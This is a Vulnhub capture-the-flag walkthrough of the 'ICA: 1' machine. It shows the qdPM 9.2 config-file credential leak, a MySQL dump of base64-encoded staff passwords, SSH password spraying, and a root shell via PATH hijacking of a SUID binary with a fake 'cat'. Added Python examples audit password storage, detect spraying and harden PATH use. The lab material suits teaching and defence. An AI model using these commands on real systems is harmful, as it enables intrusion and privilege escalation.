:: Introduction ::
Hey folks, here is a walkthrough of the “ICA: 1” machine on Vulnhub. The machine is rated easy and, in my opinion, it is very beginner-friendly.
The ICA: 1 machine can be downloaded from its Vulnhub page; the setup is the standard virtual-machine import process.
After importing and booting the machine, find its IP address and let’s begin.
:: Enumeration ::
The usual stuff! Enumeration is arguably the most important phase on any machine.
i) Network Enumeration
I use rustscan to identify open TCP ports on an instance; it is considerably faster than Nmap on its own.
rustscan -a <Machine-IP> -- -A
The command is self-explanatory if you look at rustscan’s help menu, but briefly: we run rustscan against <Machine-IP> and hand the open ports it finds to an Nmap aggressive scan (-A).
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 0e:77:d9:cb:f8:05:41:b9:e4:45:71:c1:01:ac:da:93 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCXOd91pBvAeK0CKaRrhpY2TcbujCX4hxoP5/K/fZWGV6qn6HeOopROacEm9L9nHkGfhZyk5v9mA4FWBtPMjHUAfms8tgqDJ/IY4kQU5bnQH+gMpVA1ReJ7myaWzJTKeczWn20wzBW0Zl557PYA5ypNTOw66qgDU6vFxiQoVlbT8/kNRjvhvNuP33i1nhZhSsEZdiIznDfQlPp0ekkmqyNkhwsshFtwsYfSQOW2cpopcpvNGIG38s5FzJGrV3EYFLw4J3C5NhfSSueVhkV+LXCTmJecyxd7S/fsRimPSCR8O0z0aykN/Ts4Qmkrd2mAt8yOtLJ6pFlhTorWsAK7TXCG8xqGseE9LQdUeAk3UTrv3YPak/bdxnxH23pQy9PcNSW2bRKNpg2mKbYuQmpNyjwVaxKs2Jd3rwJwaQ0XT1wVPpi7AtLizDyrtCUpbrR/gFMUITxi0inZG54aNgS668y4ww9R98Rc1WzrwT2z6vzcev2KedzX0KkWJCp3Kdm9+jU=
| 256 40:51:93:4b:f8:37:85:fd:a5:f4:d7:27:41:6c:a0:a5 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDdiFCHPlrpsgHUZ7TPuOfAk26vdS+LYia6jy6/b+3VF/PiWWxkpvaTyDIKOurj1sLje6IZLi+RCtpIzv5mI4uc=
| 256 09:85:60:c5:35:c1:4d:83:76:93:fb:c7:f0:cd:7b:8e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBJsiS3lTHIiHHiGGKretXMXZaFGQEkCOJMEYF2CgP0E
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.48 ((Debian))
|_http-title: qdPM | Login
|_http-server-header: Apache/2.4.48 (Debian)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: B0BD48E57FD398C5DA8AE8F2CCC8D90D
3306/tcp open mysql syn-ack ttl 64 MySQL 8.0.26
| mysql-info:
| Protocol: 10
| Version: 8.0.26
| Thread ID: 60
| Capabilities flags: 65535
| Some Capabilities: Support41Auth, LongPassword, SupportsTransactions, InteractiveClient, SwitchToSSLAfterHandshake, ConnectWithDatabase, SupportsCompression, IgnoreSigpipes, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, FoundRows, DontAllowDatabaseTableColumn, LongColumnFlag, ODBCClient, Speaks41ProtocolOld, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: Y64jpfe}L=*\x0D\x0C\x11r"c`6w
|_ Auth Plugin Name: caching_sha2_password
33060/tcp open mysqlx syn-ack ttl 64 MySQL X protocol listener
22/TCP -- The usual SSH port for connecting remotely to the machine.
80/TCP -- An HTTP server, Apache/2.4.48.
3306/TCP and 33060/TCP -- A MySQL 8.0.26 server (the classic protocol and the X protocol listener).
From this we can clearly see that the machine runs a web application and a MySQL database server, which is probably linked to the application. None of these services shows a directly exploitable vulnerability from its version banner alone, so the only option at this point would be brute-forcing credentials, which is my last resort. So, let’s enumerate the web application and the database server.
ii) Web Application Enumeration
Opening http://<machine-ip> in the browser, we see Apache serving an application called “qdPM 9.2”. That seemed interesting, so I read up on it: qdPM is a web-based project management tool.
I tried default credentials for this application, but they didn’t work. After some more research I found a published exploit that retrieves the database credentials of this application without any authentication.
After analysing the exploit, I concluded that simply requesting /core/config/databases.yml returns the database credentials: the configuration file sits inside the web root and the server does not restrict access to it. Easy stuff! Haha! :)
I tried it, and boom, I got the database password for qdPM!
Here are the database credentials: qdpmadmin:UcVQCMQk2STVeS6J
I tried them as the qdPM login, but authentication failed. Aah! Port 3306 is open too, so why not authenticate to the database directly?
iii) Database Enumeration
To authenticate to the database we can use the mariadb client that ships with Kali Linux.
mariadb -h <Machine-IP> -u qdpmadmin -p'UcVQCMQk2STVeS6J' --ssl=0
In this command, -h specifies the host IP address, -u the username and -p the password. --ssl=0 disables TLS for the connection.
Once authenticated, we can dump the databases present on the server. First, let’s list them with an SQL query.
MySQL [(none)]> SHOW DATABASES;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| qdpm |
| staff |
| sys |
+--------------------+
6 rows in set (0.018 sec)
Two of these databases will be useful to us: staff and qdpm. Let’s enumerate the staff DB first.
MySQL [(none)]> use staff;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [staff]> SHOW TABLES;
+-----------------+
| Tables_in_staff |
+-----------------+
| department |
| login |
| user |
+-----------------+
3 rows in set (0.004 sec)
MySQL [staff]> select * from user;
+------+---------------+--------+---------------------------+
| id | department_id | name | role |
+------+---------------+--------+---------------------------+
| 1 | 1 | Smith | Cyber Security Specialist |
| 2 | 2 | Lucas | Computer Engineer |
| 3 | 1 | Travis | Intelligence Specialist |
| 4 | 1 | Dexter | Cyber Security Analyst |
| 5 | 2 | Meyer | Genetic Engineer |
+------+---------------+--------+---------------------------+
5 rows in set (0.002 sec)
MySQL [staff]> select * from login;
+------+---------+--------------------------+
| id | user_id | password |
+------+---------+--------------------------+
| 1 | 2 | c3VSSkFkR3dMcDhkeTNyRg== |
| 2 | 4 | N1p3VjRxdGc0MmNtVVhHWA== |
| 3 | 1 | WDdNUWtQM1cyOWZld0hkQw== |
| 4 | 3 | REpjZVZ5OThXMjhZN3dMZw== |
| 5 | 5 | Y3FObkJXQ0J5UzJEdUpTeQ== |
+------+---------+--------------------------+
5 rows in set (0.002 sec)
MySQL [staff]> select * from department;
+------+----------+
| id | name |
+------+----------+
| 1 | Agent |
| 2 | Engineer |
+------+----------+
As you can see, we got some passwords, yeah! But they are base64 encoded.
I guess the developers didn’t know that base64 is an encoding, not an encryption algorithm. I decoded each value with echo "<password>" | base64 -d, mapped it to the correct username via the user_id column, and got this table:
Username | Password
---------|-----------------
Lucas    | suRJAdGwLp8dy3rF
Dexter   | 7ZwV4qtg42cmUXGX
Smith    | X7MQkP3W29fewHdC
Travis   | DJceVy98W28Y7wLg
Meyer    | cqNnBWCByS2DuJSy
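The decode-and-map step above, as an added example that is not part of the original write-up: it joins the login rows to the user rows on user_id, base64-decodes each stored value, and also shows the check an auditor would run over a password column, flagging values that decode to printable text instead of being one-way hashes. The rows are the ones shown in the dumps above; the helper names are my own.

```python
import base64
import binascii
import string
from typing import Dict, List, Optional

# Rows copied from the staff.user and staff.login dumps shown above.
USERS = {1: "Smith", 2: "Lucas", 3: "Travis", 4: "Dexter", 5: "Meyer"}
LOGINS = [
    (1, 2, "c3VSSkFkR3dMcDhkeTNyRg=="),
    (2, 4, "N1p3VjRxdGc0MmNtVVhHWA=="),
    (3, 1, "WDdNUWtQM1cyOWZld0hkQw=="),
    (4, 3, "REpjZVZ5OThXMjhZN3dMZw=="),
    (5, 5, "Y3FObkJXQ0J5UzJEdUpTeQ=="),
]

# Printable ASCII minus vertical-tab/form-feed, which never appear in a password.
PRINTABLE = set(string.printable) - set("\x0b\x0c")


def decode_if_reversible(value: str) -> Optional[str]:
    """Return the decoded text when `value` is strict base64 of printable ASCII,
    otherwise None. A real password hash (phpass '$P$...', bcrypt, ...) contains
    characters outside the base64 alphabet or decodes to binary, so it fails
    this test; that is what makes it a useful audit check for a password column."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    if not text or not all(ch in PRINTABLE for ch in text):
        return None
    return text


def map_credentials(users: Dict[int, str], logins) -> Dict[str, str]:
    """Join login rows to user names via user_id and decode the stored value."""
    creds = {}
    for _row_id, user_id, stored in logins:
        decoded = decode_if_reversible(stored)
        if decoded is not None:
            creds[users[user_id]] = decoded
    return creds


def audit_password_column(logins) -> List[int]:
    """Row ids whose password column holds reversible encoding rather than a hash."""
    return [row_id for row_id, _uid, stored in logins
            if decode_if_reversible(stored) is not None]


if __name__ == "__main__":
    for name, password in map_credentials(USERS, LOGINS).items():
        print(f"{name:<8} {password}")
    print("rows storing reversible values:", audit_password_column(LOGINS))
```

The same audit function reports the qdPM admin hash as not reversible, which is the behaviour you want from a password column: every row in staff.login fails that bar.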
After this I went through the qdPM database but didn’t find anything interesting except these credentials:
admin@localhost.com: $P$EmesnWRcY9GrK0hDzwaV3rvQnMJ/Fx0
The password is hashed. I tried to crack it with John the Ripper and the rockyou.txt wordlist but didn’t find the password.
Let’s try spraying the staff passwords against SSH to get a remote shell instead.
:: Exploitation ::
Trying those credentials, I found that the usernames “dexter” and “travis”, with their corresponding passwords, get us SSH access to the machine.
Easy stuff! We got SSH.
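From the defender’s side, the spray just described leaves a characteristic trace in sshd’s log: one source trying several different usernames in a short window, followed by an Accepted line. The following is an added example, not part of the original write-up, that parses constructed auth.log lines (the hostnames, addresses and timestamps are made up) and flags that pattern, then lists which accounts the flagged source actually got into, which are the ones to reset first.

```python
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Tuple

# Constructed sample auth.log lines (not captured from the ICA machine): one
# source tries several staff names, another source fails once on its own account.
SAMPLE_AUTH_LOG = """\
Oct  3 09:12:01 ica sshd[1401]: Failed password for invalid user smith from 192.0.2.10 port 51000 ssh2
Oct  3 09:12:03 ica sshd[1402]: Failed password for invalid user lucas from 192.0.2.10 port 51001 ssh2
Oct  3 09:12:05 ica sshd[1403]: Failed password for invalid user meyer from 192.0.2.10 port 51002 ssh2
Oct  3 09:12:07 ica sshd[1404]: Accepted password for travis from 192.0.2.10 port 51003 ssh2
Oct  3 09:12:09 ica sshd[1405]: Accepted password for dexter from 192.0.2.10 port 51004 ssh2
Oct  3 09:30:00 ica sshd[1500]: Failed password for travis from 192.0.2.77 port 40000 ssh2
Oct  3 09:30:04 ica sshd[1501]: Accepted password for travis from 192.0.2.77 port 40001 ssh2
"""

# Matches the standard OpenSSH "Accepted/Failed password" syslog lines.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)

Event = Tuple[datetime, str, str, str]  # (timestamp, source ip, username, result)


def parse_auth_log(text: str, year: int = 2021) -> List[Event]:
    """Syslog lines carry no year, so one is supplied (constructed value here)."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["ip"], m["user"], m["result"]))
    return events


def detect_password_spray(events: List[Event], min_users: int = 3,
                          window_seconds: int = 600) -> Dict[str, List[str]]:
    """Flag source IPs that try at least `min_users` distinct usernames within
    `window_seconds`. A spray (few passwords, many users) looks like this; a
    user mistyping their own password repeatedly does not."""
    by_ip = defaultdict(list)
    for ts, ip, user, _result in events:
        by_ip[ip].append((ts, user))
    flagged = {}
    for ip, attempts in by_ip.items():
        attempts.sort()
        for i, (start, _user) in enumerate(attempts):
            users = {u for t, u in attempts[i:]
                     if (t - start).total_seconds() <= window_seconds}
            if len(users) >= min_users:
                flagged[ip] = sorted(users)
                break
    return flagged


def compromised_accounts(events: List[Event], flagged: Dict[str, List[str]]) -> List[str]:
    """Accounts that a flagged source eventually logged into: reset these first."""
    return sorted({user for _ts, ip, user, result in events
                   if ip in flagged and result == "Accepted"})


if __name__ == "__main__":
    evts = parse_auth_log(SAMPLE_AUTH_LOG)
    hits = detect_password_spray(evts)
    print("spraying sources:", hits)
    print("accounts to reset:", compromised_accounts(evts, hits))
```

The threshold and window are tunable; the point is that the detection keys on the number of distinct usernames per source, not on the number of failures, because a spray against a weak password succeeds with very few attempts per account.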
From travis’s home directory we get the user flag, located at /home/travis/user.txt
ICA{Secret_Project}
In dexter’s home directory we find a note (note.txt):
It seems to me that there is a weakness while accessing the system. As far as I know, the contents of executable files are partially viewable. I need to find out if there is a vulnerability or not.
:: Spawning root :) (Privilege Escalation) ::
We pwned the users on this machine, but what about root?
I ran linpeas.sh on the machine to help with privilege escalation, but it didn’t give any satisfactory output.
I did find a weird SUID binary, get_access, in the /opt directory. Running it gives the following output:
This is a 64-bit ELF executable, so let’s do some reverse engineering. I opened it in Ghidra and checked the main function.
We can see that it sets the uid and gid and then prints the contents of /root/system.info by calling cat.
Since the path to the cat binary (the standard tool for printing a file’s contents) is not fully specified, the program resolves it through the PATH environment variable, so we can do PATH hijacking.
We will create our own executable named cat with malicious content; it will get executed because the program finds our cat first in the PATH.
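To make the root cause concrete from the developer’s side, here is an added example (not the get_access binary’s code, and not part of the original write-up) that shows the precondition for this hijack, an audit of PATH for entries an unprivileged user can write to, and the hardened way to launch the helper: absolute program path, no shell, and a fixed environment. The command string and the trusted PATH value are assumptions of mine.

```python
import os
import shlex
import stat
import subprocess
from typing import Callable, List, Optional

# Assumed (not taken from the binary): the shape of the command the vulnerable
# helper hands to the shell. What matters is the bare program name "cat".
VULNERABLE_COMMAND = "cat /root/system.info"
# Assumed safe search path a privileged helper should use instead of the caller's.
TRUSTED_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"


def relies_on_path_lookup(command: str) -> bool:
    """True when the program word contains no '/', meaning the shell walks the
    caller's PATH to find it. That is the precondition for the hijack above."""
    argv = shlex.split(command)
    return bool(argv) and "/" not in argv[0]


def risky_path_entries(path_value: str,
                       writable_check: Optional[Callable[[str], bool]] = None) -> List[str]:
    """PATH entries an unprivileged user could plant a binary in: empty or
    relative entries, and world-writable directories (a /tmp/exploit-style entry).
    `writable_check` can be injected for testing; by default it stats the directory."""
    if writable_check is None:
        def writable_check(directory: str) -> bool:
            try:
                return bool(os.stat(directory).st_mode & stat.S_IWOTH)
            except OSError:
                return False
    risky = []
    for entry in path_value.split(":"):
        if entry == "" or not entry.startswith("/") or writable_check(entry):
            risky.append(entry)
    return risky


def show_file_hardened(path: str) -> subprocess.CompletedProcess:
    """The fix: absolute program path, argv list (no shell), and a fixed
    environment so neither PATH nor other inherited variables decide what runs."""
    return subprocess.run(["/bin/cat", path], env={"PATH": TRUSTED_PATH},
                          capture_output=True, text=True, check=False)


if __name__ == "__main__":
    print("vulnerable launch pattern:", relies_on_path_lookup(VULNERABLE_COMMAND))
    print("risky entries in this shell's PATH:", risky_path_entries(os.environ.get("PATH", "")))
    print(show_file_hardened("/etc/hostname").stdout.strip())
```

Dropping privileges or using an absolute path alone is not enough if the helper still inherits the caller’s environment; the fixed env dict is what removes the user’s influence over which executable runs.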
i) Assembling the bomb
So, let’s create our malicious cat. The script below spawns a bash shell; we save it as a file named cat and make it executable.
echo -e '#!/bin/bash\n/bin/bash -p' > cat
chmod +x cat
ii) Deploying the bomb
We create a directory named exploit inside /tmp and move our cat into it. Then we prepend /tmp/exploit to the PATH variable, so that whenever the system searches for a cat binary it finds /tmp/exploit/cat first.
Great shit!
mkdir /tmp/exploit
mv cat /tmp/exploit/
export PATH="/tmp/exploit:$PATH"
iii) Tick Tick Booom!
Let’s trigger the bomb by running get_access again and pwn root!
Yes! We got root!
We successfully pwned the ICA: 1 lab. Hopefully the ICA administrators are asleep, since we got them!
Let’s grab the root.txt flag, located at /root/root.txt:
ICA{Next_Generation_Self_Renewable_Genetics}
:: Summary ::
We exploited a vulnerability in the qdPM 9.2 application to obtain the database credentials, used them to access the database, and dumped the staff passwords, which were only base64 encoded. We then authenticated to the server over SSH with the dumped credentials to get the user flag. Finally, we abused the SUID permissions on the get_access binary through PATH hijacking to get a root shell.
I hope this write-up is helpful to you!
In case you are still stuck, do PM me on Sanchit's LinkedIn.
Credits for the machine: @onurturali